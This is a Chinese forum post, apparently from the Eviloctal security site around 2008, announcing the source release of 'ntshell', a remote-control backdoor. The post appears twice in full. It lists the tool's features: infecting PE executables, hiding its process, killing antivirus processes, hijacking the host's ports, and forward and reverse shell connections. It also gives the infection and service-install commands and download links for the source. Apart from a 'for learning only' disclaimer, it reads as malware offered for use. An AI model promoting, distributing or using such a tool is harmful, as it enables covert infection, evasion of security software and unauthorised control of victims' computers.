Submit:x0r
Software authors:被诅咒的神
SourceDocument:邪恶八进制信息安全团队(www.eviloctal.com)
这是一个免费开源的远程控制软件,源码仅供学习参考,请勿用于非法用途。
功能特点:
1.提供CMDSHELL、文件管理、进程管理、端口代理(未完成)、屏幕捕获和一些其它功能
2.可感染32位PE文件,感染后可选择在宿主进程空间中运行(无进程)或创建新进程运行,
在宿主进程中运行还可选择端口劫持,即复用宿主所打开的端口,感染不影响宿主正常运行
3.用到了一些内核技术,包括活动进程链脱链(隐藏进程),与ICESWORD相同的进程强杀方
法(能杀掉一些杀毒软件的进程),Ring0打开文件(用于感染正在运行的可执行文件),
2000/xp下采用无驱Ring0
4.同时支持正向连接和反向连接,服务端和控制端均可接受管理多个连接
感染文件方法:ntshell.exe -infect C:\test.exe
ntshell.exe先用生成服务端生成
安装成系统服务:ntshell.exe -install
服务移除:ntshell.exe -remove
代码编译环境:Windows XP SP2 + VC6.0
服务端采用纯C编写,VC直接编译
控制端为C++和WTL,需在VC中加入WTL支持才能编译
如果您发现BUG或是有什么好的建议,请发送mail给我:ktwyz#163.com
注:由于没时间做兼容性测试,一些内核操作可能导致系统蓝屏,测试前请先保存好数据
注2:该版本尚未加入驱动支持,故暂时无法在2003下使用Ring0的全部功能
2008-01-01更新:
修正以服务方式运行程序会崩溃的BUG
修正部分窗口不能用快捷键的问题
修正控制台——下载并运行不能运行的BUG
2008-01-13更新:
内码改为unicode,非简体中文系统不会乱码了
增加了一个小型PELOADER,运行被感染的文件后不会再释放出DLL文件
增加了文件上传下载功能(不太好用,可以无视)
修正了几个BUG,做了一些小调整
ntshell停止开发,在此感谢提供BUG和支持我的朋友
下载地址:包1:https://forum.eviloctal.com/attachment.php?aid=7076
下载地址:包2:https://forum.eviloctal.com/attachment.php?aid=7077
Software authors:被诅咒的神
SourceDocument:邪恶八进制信息安全团队(www.eviloctal.com)
这是一个免费开源的远程控制软件,源码仅供学习参考,请勿用于非法用途。
功能特点:
1.提供CMDSHELL、文件管理、进程管理、端口代理(未完成)、屏幕捕获和一些其它功能
2.可感染32位PE文件,感染后可选择在宿主进程空间中运行(无进程)或创建新进程运行,
在宿主进程中运行还可选择端口劫持,即复用宿主所打开的端口,感染不影响宿主正常运行
3.用到了一些内核技术,包括活动进程链脱链(隐藏进程),与ICESWORD相同的进程强杀方
法(能杀掉一些杀毒软件的进程),Ring0打开文件(用于感染正在运行的可执行文件),
2000/xp下采用无驱Ring0
4.同时支持正向连接和反向连接,服务端和控制端均可接受管理多个连接
感染文件方法:ntshell.exe -infect C:\test.exe
ntshell.exe先用生成服务端生成
安装成系统服务:ntshell.exe -install
服务移除:ntshell.exe -remove
代码编译环境:Windows XP SP2 + VC6.0
服务端采用纯C编写,VC直接编译
控制端为C++和WTL,需在VC中加入WTL支持才能编译
如果您发现BUG或是有什么好的建议,请发送mail给我:ktwyz#163.com
注:由于没时间做兼容性测试,一些内核操作可能导致系统蓝屏,测试前请先保存好数据
注2:该版本尚未加入驱动支持,故暂时无法在2003下使用Ring0的全部功能
2008-01-01更新:
修正以服务方式运行程序会崩溃的BUG
修正部分窗口不能用快捷键的问题
修正控制台——下载并运行不能运行的BUG
2008-01-13更新:
内码改为unicode,非简体中文系统不会乱码了
增加了一个小型PELOADER,运行被感染的文件后不会再释放出DLL文件
增加了文件上传下载功能(不太好用,可以无视)
修正了几个BUG,做了一些小调整
ntshell停止开发,在此感谢提供BUG和支持我的朋友
下载地址:包1:https://forum.eviloctal.com/attachment.php?aid=7076
下载地址:包2:https://forum.eviloctal.com/attachment.php?aid=7077
